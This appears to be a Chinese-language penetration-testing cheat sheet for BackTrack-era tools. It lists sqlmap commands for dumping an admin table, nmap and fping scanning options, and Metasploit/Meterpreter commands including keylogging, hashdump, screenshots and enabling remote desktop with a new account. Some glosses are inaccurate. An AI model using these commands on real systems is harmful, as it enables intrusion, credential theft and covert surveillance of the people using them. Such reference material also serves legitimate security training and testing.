sqlmap:
./sqlmap.py -u http://192.168.15.13:8088/dipan/notebook/file_show.php?file_id=13 检测注入
./sqlmap.py -u http://192.168.15.13:8088/dipan/notebook/file_show.php?file_id=13 --dbs列数据库
./sqlmap.py -u http://192.168.15.13:8088/dipan/notebook/file_show.php?file_id=13 -D shujuku --tables 列选定数据库中的表
./sqlmap.py -u http://192.168.15.13:8088/dipan/notebook/file_show.php?file_id=13 -D shujuku -T adminuser --columns 列 表中的字段
./sqlmap.py -u http://192.168.15.13:8088/dipan/notebook/file_show.php?file_id=13 -D shujuku -T adminuser -C username --dump
ps -auxw 查看进程
首先使用ps -ef命令确定要杀死进程的PID,然后输入以下命令:
kill PID 指定进程PID
rdesktop 192.168.235.139:3389 连接远程桌面
sudo lsb_release -a 查看内核ubuntu版本
dpkg -i XXXXXX.deb 解压
who:显示当前已登录用户的信息
startx 开机
halt 关机
cp 复制
reboot 重启
nmap -sP 192.168.235.1/255
nmap -v -n -A IP 操作系统识别
nmap -v -n -sP 扫描端口
serach 要搜索的文件
show options
clear或者 ctrl+l 清屏
whois 域名/ip 查看域名的详细信息。
Fping:
-a 只显示存活IP
-s 扫描后统计
-r Ping次数
-g 扫描范围
fping -a -s -r 1 -g 220.190.19.1 220.190.19.255 探测主机存活数
nbtscan 192.168.235.1-255 扫描网关内的主机名MAC
ping 域名/ip 测试本机到远端主机是否联通。
dig 域名/ip 查看域名解析的详细信息。
host -l 域名 dns服务器 传输zone
BT5下NMAP使用命令
nmap -script=smb-check-vulns.nse IP 探测目标漏洞
Nmap -v -n -A IP 综合扫描
Nmap -v -sS -n -p1-65535 IP
Nmap -v -sS -p1-65535 -n -oX scan.xml -P0 IP
Nmap -v -sT -n -p1-65535 -PN IP
Nmap -v -p1-65535 -P0 IP
Nmap -v -p1-65535 -sS IP
Nmap -O IP 探测系统类型
Nmap -V -n -A IP
-p0 不ping
-PN 强制
-n 说是不多次解析DNS
nmap:
-sS 半开扫描TCP和SYN扫描。
-sT 完全TCP连接扫描。
-sU UDP扫描
-PS syn包探测(防火墙探测)
-PA ack包探测(防火墙探测)
-PN 不ping。
-n 不dns解析。
-A -O和-sV。
-O 操作系统识别。
-sV 服务版本信息(banner)
-p 端口扫描。
-T 设置时间级别(0-5)
-iL 导入扫描结果。
-oG 输出扫描结果。
操作系统识别:
p0f -i eth0 -U -p 开启混杂模式。
xprobe2 ip|域名 检测os。
Metasploit:
set payload windows/meterpreter/reverse_tcp 装载meterpreter
db_nmap -T Aggressive -sV -n -O -v 192.168.235.138 在msf中使用nmap扫描
db_destroy pentest
db_create pentest
db_hosts 查看数据库
db_services 查看端口及服务
db_autopwn -t -p -e -e表示全自动攻击 -t使用所有的攻击模块 -i表示指定主机
db_del_host
meterpreter模块下常用命令
shell 获得一个cmd
run vnc 远程控制屏幕 要等一会儿.
ps 查看进程
migtuid 1575 如果进程Id 使用后用户为administrator
screenshot 截取屏幕
keyscan_start 开启键盘记录
keyscan_dump 查看键盘记录
keyscan_stop 关闭键盘记录
hashdump 获取远程计算机所有账户密码
run getgui -e 打开3389
run getgui -u admin -p 123456 -u是用户 -p是密码
svn update 升级
msfupdate 升级
./msfweb Web接口127.0.0.1:55555。.
./msfconsole 字符下的Console。
help 帮助
show <option> 显示选项
search <name> 搜索名字
use <exploit name> 使用漏洞
show options 显示选项
set <OPTION NAME> <option> 设置选项
show payloads 显示装置
set PAYLOAD <payload name> 设置装置
show options 显示选项
set <OPTION NAME> <option> 设置选项
show targets 显示目标(os版本)
set TARGET <target number> 设置目标版本
exploit 开始漏洞攻击
sessions -l 列出会话
sessions -i <ID> 选择会话
sessions -k <ID> 结束会话
<ctrl> z 把会话放到后台
<ctrl> c 结束会话
jobs 列出漏洞运行工作
jobs -K 结束一个漏洞运行工作
查看进程
PS
对目标主机的屏幕进行截图。
upload file
向目标主机上传文件。
download file
从目标主机下载文件。
keyscan_start
针对远程目标主机开启键盘记录功能。
keyscan_dump
存储目标主机上捕获的键盘记录。
keyscan_stop
停止针对目标主机的键盘记录。
getprivs
show auxiliary 显示辅助模块
use <auxiliary name> 使用辅助模块
set <OPTION NAME> <option> 设置选项
run 运行模块
scanner/smb/version 扫描系统版本
scanner/mssql/mssql_ping 测试mssql是否在线
scanner/mssql/mssql_login 测试登录(暴力或字典)
Attacker behind firewall: bind shell正向
Target behind firewall: reverse shell反向
Meterpreter衔接不懂dos的可以用这个:
db_import_nessus_nbe 加载nessus的扫描结果
db_import_nmap_xml 加载nmap的扫描结果
自动化攻击流程:
cd /pentest/exploit/framework3
./msfconsole
load db_sqlite3
字符接口攻击流程:
./msfcli | grep -i <name>
./msfcli <exploit or auxiliary> S
./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E